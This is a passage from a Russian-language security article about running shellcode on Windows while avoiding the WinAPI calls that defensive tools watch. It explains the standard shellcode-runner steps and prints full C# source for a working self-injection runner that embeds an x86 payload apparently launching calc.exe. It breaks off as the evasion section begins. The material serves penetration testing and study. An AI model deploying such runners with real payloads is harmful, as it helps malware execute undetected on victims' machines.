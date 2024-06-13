За­час­тую ата­кующие исполь­зуют стан­дар­тные фун­кции WinAPI для исполне­ния шелл‑кода. Все эти методы дав­ным‑дав­но извес­тны любому защит­ному средс­тву. В статье мы отой­дем от про­торен­ного пути и будем исполь­зовать иную парадиг­му — пол­ный отказ от исполь­зования WinAPI.

warning Статья име­ет озна­коми­тель­ный харак­тер и пред­назна­чена для спе­циалис­тов по безопас­ности, про­водя­щих тес­тирова­ние в рам­ках кон­трак­та. Автор и редак­ция не несут ответс­твен­ности за любой вред, при­чинен­ный с при­мене­нием изло­жен­ной информа­ции. Рас­простра­нение вре­донос­ных прог­рамм, наруше­ние работы сис­тем и наруше­ние тай­ны перепис­ки прес­леду­ются по закону.

Что пред­став­ляет собой стан­дар­тный шелл‑код‑ран­нер? В прин­ципе, ничего осо­бен­ного в нем нет. Алго­ритм прост как валенок:

Сге­нери­ровать, написать или где‑то поза­имс­тво­вать нуж­ный шелл‑код. Для это­го час­то исполь­зуют готовые фрей­мвор­ки вро­де Metasploit. Вы­делить память под шелл‑код. Здесь чаще все­го обра­щают­ся к фун­кции VirtualAlloc( ) или низ­коуров­невым ана­логам, нап­ример NtAllocateVirtualMemory( ) . Ес­ли на пун­кте 2 память была выделе­на без бита executable, то пос­тавить этот бит на память. Тут дер­гают VirtualProtect( ) или NtProtectVirtualMemory( ) . Ско­пиро­вать шелл‑код в память. В слу­чае С++ прог­раммы обра­щают­ся к memcpy( ) , а в слу­чае C# мож­но рас­смот­реть Marshal. Copy( ) . Пе­редать поток управле­ния по адре­су шелл‑кода. Реали­зует­ся, нап­ример, через соз­дание нового потока внут­ри CreateThread( ) . Ус­пех!

Та­ким обра­зом, стан­дар­тный шелл‑код‑ран­нер выг­лядит вот так.

using System ; using System. Runtime. InteropServices ; namespace ConsoleApp1 { class Program { [ DllImport ( "kernel32. dll" , SetLastError = true , ExactSpelling = true ) ] static extern IntPtr VirtualAlloc ( IntPtr lpAddress , uint dwSize , uint flAllocationType , uint flProtect ) ; [ DllImport ( "kernel32. dll" ) ] static extern IntPtr CreateThread ( IntPtr lpThreadAttributes , uint dwStackSize , IntPtr lpStartAddress , IntPtr lpParameter , uint dwCreationFlags , IntPtr lpThreadId ) ; [ DllImport ( "kernel32. dll" ) ] static extern UInt32 WaitForSingleObject ( IntPtr hHandle , UInt32 dwMilliseconds ) ; static void Main ( string [ ] args ) { byte [ ] x86shc = new byte [ 193 ] { 0xfc , 0xe8 , 0x82 , 0x00 , 0x00 , 0x00 , 0x60 , 0x89 , 0xe5 , 0x31 , 0xc0 , 0x64 , 0x8b , 0x50 , 0x30 , 0x8b , 0x52 , 0x0c , 0x8b , 0x52 , 0x14 , 0x8b , 0x72 , 0x28 , 0x0f , 0xb7 , 0x4a , 0x26 , 0x31 , 0xff , 0xac , 0x3c , 0x61 , 0x7c , 0x02 , 0x2c , 0x20 , 0xc1 , 0xcf , 0x0d , 0x01 , 0xc7 , 0xe2 , 0xf2 , 0x52 , 0x57 , 0x8b , 0x52 , 0x10 , 0x8b , 0x4a , 0x3c , 0x8b , 0x4c , 0x11 , 0x78 , 0xe3 , 0x48 , 0x01 , 0xd1 , 0x51 , 0x8b , 0x59 , 0x20 , 0x01 , 0xd3 , 0x8b , 0x49 , 0x18 , 0xe3 , 0x3a , 0x49 , 0x8b , 0x34 , 0x8b , 0x01 , 0xd6 , 0x31 , 0xff , 0xac , 0xc1 , 0xcf , 0x0d , 0x01 , 0xc7 , 0x38 , 0xe0 , 0x75 , 0xf6 , 0x03 , 0x7d , 0xf8 , 0x3b , 0x7d , 0x24 , 0x75 , 0xe4 , 0x58 , 0x8b , 0x58 , 0x24 , 0x01 , 0xd3 , 0x66 , 0x8b , 0x0c , 0x4b , 0x8b , 0x58 , 0x1c , 0x01 , 0xd3 , 0x8b , 0x04 , 0x8b , 0x01 , 0xd0 , 0x89 , 0x44 , 0x24 , 0x24 , 0x5b , 0x5b , 0x61 , 0x59 , 0x5a , 0x51 , 0xff , 0xe0 , 0x5f , 0x5f , 0x5a , 0x8b , 0x12 , 0xeb , 0x8d , 0x5d , 0x6a , 0x01 , 0x8d , 0x85 , 0xb2 , 0x00 , 0x00 , 0x00 , 0x50 , 0x68 , 0x31 , 0x8b , 0x6f , 0x87 , 0xff , 0xd5 , 0xbb , 0xf0 , 0xb5 , 0xa2 , 0x56 , 0x68 , 0xa6 , 0x95 , 0xbd , 0x9d , 0xff , 0xd5 , 0x3c , 0x06 , 0x7c , 0x0a , 0x80 , 0xfb , 0xe0 , 0x75 , 0x05 , 0xbb , 0x47 , 0x13 , 0x72 , 0x6f , 0x6a , 0x00 , 0x53 , 0xff , 0xd5 , 0x63 , 0x61 , 0x6c , 0x63 , 0x2e , 0x65 , 0x78 , 0x65 , 0x00 } ; int size = x86shc . Length ; IntPtr addr = VirtualAlloc ( IntPtr . Zero , 0x1000 , 0x3000 , 0x40 ) ; Marshal . Copy ( x86shc , 0 , addr , size ) ; IntPtr hThread = CreateThread ( IntPtr . Zero , 0 , addr , IntPtr . Zero , 0 , IntPtr . Zero ) ; WaitForSingleObject ( hThread , 0xFFFFFFFF ) ; } } }

Об­рати вни­мание, что в кон­це идет вызов WaitForSingleObject( ) . Он здесь не прос­то так. Наша прог­рамма дела­ет self-injection (внед­рение шелл‑кода в адресное прос­транс­тво текуще­го про­цес­са). Запуск шелл‑кода про­исхо­дит в фун­кции CreateThread( ) . Если бы пос­ле этой фун­кции ничего не было, то прог­рамма при­оста­нови­ла бы выпол­нение и завер­шилась. Как следс­твие, наш шелл‑код перес­танет выпол­нять­ся.

По­это­му вызов фун­кции WaitForSingleObject( ) пре­дот­вра­щает преж­девре­мен­ное зак­рытие прог­раммы. Наша основная прог­рамма будет пос­лушно ожи­дать успешно­го исполне­ния шелл‑кода.

Итак, запус­каем код и видим, что все ста­биль­но работа­ет.

Те­перь давай поп­робу­ем изме­нить прог­рамму так, что­бы изба­вить­ся от всех фун­кций WinAPI. В качес­тве шелл‑кода, как ты понял, исполь­зуем стан­дар­тный запуск каль­кулято­ра. Архи­тек­тура — х86.

Синхронизация через Sleep